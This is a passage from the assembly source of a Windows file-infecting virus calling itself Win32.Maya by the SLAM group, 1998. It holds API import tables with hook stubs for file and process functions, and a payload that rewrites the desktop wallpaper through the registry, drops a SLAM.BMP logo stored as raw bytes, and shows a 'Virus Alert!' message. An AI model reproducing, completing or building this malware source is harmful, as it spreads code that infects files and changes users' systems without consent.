maya_findfirstfilea		db 'FindFirstFileA',0
maya_findfirstfilea_add		dd 0

maya_findnextfilea_len		dd 14
maya_findnextfilea		db 'FindNextFileA',0
maya_findnextfilea_add		dd 0

maya_findclose_len		dd 10
maya_findclose			db 'FindClose',0
maya_findclose_add		dd 0

maya_setfilepointer_len		dd 15
maya_setfilepointer		db 'SetFilePointer',0
maya_setfilepointer_add		dd 0

maya_setendoffile_len		dd 13
maya_setendoffile		db 'SetEndOfFile',0
maya_setendoffile_add		dd 0

maya_getcurrentdirectorya_len	dd 15h
maya_getcurrentdirectorya	db 'GetCurrentDirectoryA',0
maya_getcurrentdirectorya_add	dd 0

maya_setcurrentdirectorya_len	dd 15h
maya_setcurrentdirectorya	db 'SetCurrentDirectoryA',0
maya_setcurrentdirectorya_add	dd 0

maya_getfileattributesa_len	dd 13h
maya_getfileattributesa		db 'GetFileAttributesA',0
maya_getfileattributesa_add	dd 0

maya_setfileattributesa_len	dd 13h
maya_setfileattributesa		db 'SetFileAttributesA',0
maya_setfileattributesa_add	dd 0

maya_getsystemtime_len		dd 14
maya_getsystemtime		db 'GetSystemTime',0
maya_getsystemtime_add		dd 0

maya_getwindowsdirectorya_len	dd 15h
maya_getwindowsdirectorya	db 'GetWindowsDirectoryA',0
maya_getwindowsdirectorya_add	dd 0

maya_maya	dd 'MAYA'	;endmarker

maya_movefilea_len		dd 10
maya_movefilea			db 'MoveFileA',0
maya_movefilea_add		dd 0
				dd offset maya_deadcode_call1

maya_copyfilea_len		dd 10
maya_copyfilea			db 'CopyFileA',0
maya_copyfilea_add		dd 0
				dd offset maya_deadcode_call2

maya_createfilea2_len		dd 12
maya_createfilea2		db 'CreateFileA',0
maya_createfilea2_add		dd 0
				dd offset maya_deadcode_call3

maya_deletefilea_len		dd 12
maya_deletefilea		db 'DeleteFileA',0
maya_deletefilea_add		dd 0
				dd offset maya_deadcode_call4

maya_setfileattributesa2_len	dd 13h
maya_setfileattributesa2	db 'SetFileAttributesA',0
maya_setfileattributesa2_add	dd 0
				dd offset maya_deadcode_call5

maya_getfileattributesa2_len	dd 13h
maya_getfileattributesa2	db 'GetFileAttributesA',0
maya_getfileattributesa2_add	dd 0
				dd offset maya_deadcode_call6

maya_getfullpathnamea_len	dd 11h
maya_getfullpathnamea		db 'GetFullPathNameA',0
maya_getfullpathnamea_add	dd 0
				dd offset maya_deadcode_call7

maya_createprocessa_len		dd 15
maya_createprocessa		db 'CreateProcessA',0
maya_createprocessa_add		dd 0
				dd offset maya_deadcode_call8

maya_shai		dd 'SHAI'	;endmarker

;
;payload stuff
;

maya_cpd		db 'Control Panel\Desktop',0
maya_reg		dd 0	;@1E76
maya_one		db '1',0	;@1E7A
maya_zero		db '0',0	;@1E7C
maya_tilewallpaper	db 'TileWallpaper',0 ;@1E7E
maya_wallpaperstyle	db 'WallpaperStyle',0
maya_slamfilename	db 'SLAM.BMP',0		;@1E9B
maya_slamhandle		dd 0		;handle of created SLAM.BMP @1EA4
maya_numberofwritten	dd 0		;paramter of WriteFile
maya_mayamsg		db 'Win32.Maya (c) 1998 The Shaitan [SLAM]',0
maya_viralert		db 'Virus Alert!',0
maya_user32		db 'USER32.dll',0	;@1EE0
maya_advapi32		db 'ADVAPI32.dll',0	;@1EEB
maya_u32hand		dd 0		;handle to user32 @1EF8
maya_a32hand		dd 0		;handle to advapi32 @1EFC
maya_dd5		dd 0		;????		@1F00
maya_regopenkeyexa	db 'RegOpenKeyExA',0		;@1F04
maya_regsetvalueexa	db 'RegSetValueExA',0		;
maya_messageboxa	db 'MessageBoxA',0		;
maya_sysparam		db 'SystemParametersInfoA',0
maya_regopenkeyexa_add	dd 0		;add of fn	@1F43
maya_regsetvalueexa_add	dd 0		;add of fn	@1F47
maya_messageboxa_add	dd 0		;add of fn	@1F4B
maya_sysparam_add	dd 0		;add of fn	@1F4F
;
;the 'SLAM' logo stored in bitmap file format
;
slam_len equ 230	;@1F53
slam db  66, 77,230,  0,  0,  0,  0,  0,  0,  0, 62,  0,  0,  0, 40,  0,  0,  0, 60
     db   0,  0,  0, 21,  0,  0,  0,  1,  0,  1,  0,  0,  0,  0,  0,168,  0,  0,  0
     db 196, 14,  0,  0,196, 14,  0,  0,  0,  0,  0,  0,  0,  0,  0,  0,  0,  0,  0
     db   0,255,255,255,  0,255,255,255,255,255,255,255,240,255,255,255,255,255,255
     db 255,240,255,255,255,255,255,255,255,240,255,255,255,255,255,255,255,240,224
     db   2,  0,131,226, 14, 60,112,224,  2,  0,131,226, 14, 60,112,227,130, 15,131
     db 226, 14, 60,112,227,130, 15,131,226, 14, 60,112,227,130, 15,128,  2, 14, 60
     db 112,255,130, 15,128,  2, 14, 60,112,224,  2, 31,195,134, 30, 60,112,224,  2
     db  63,227,142, 62, 60,112,227,254, 63,227,142, 62, 60,112,227,226, 63,227,142
     db  62, 60,112,227,226, 63,227,142, 62, 60,112,227,226, 63,227,142, 62, 60,112
     db 224,  2, 63,224, 14,  0,  0,112,224,  2, 63,224, 14,  0,  0,112,255,255,255
     db 255,255,255,255,240,255,255,255,255,255,255,255,240,255,255,255,255,255,255
     db 255,240

maya_end equ $	

.data
host:
	push 0
	call ExitProcess


end maya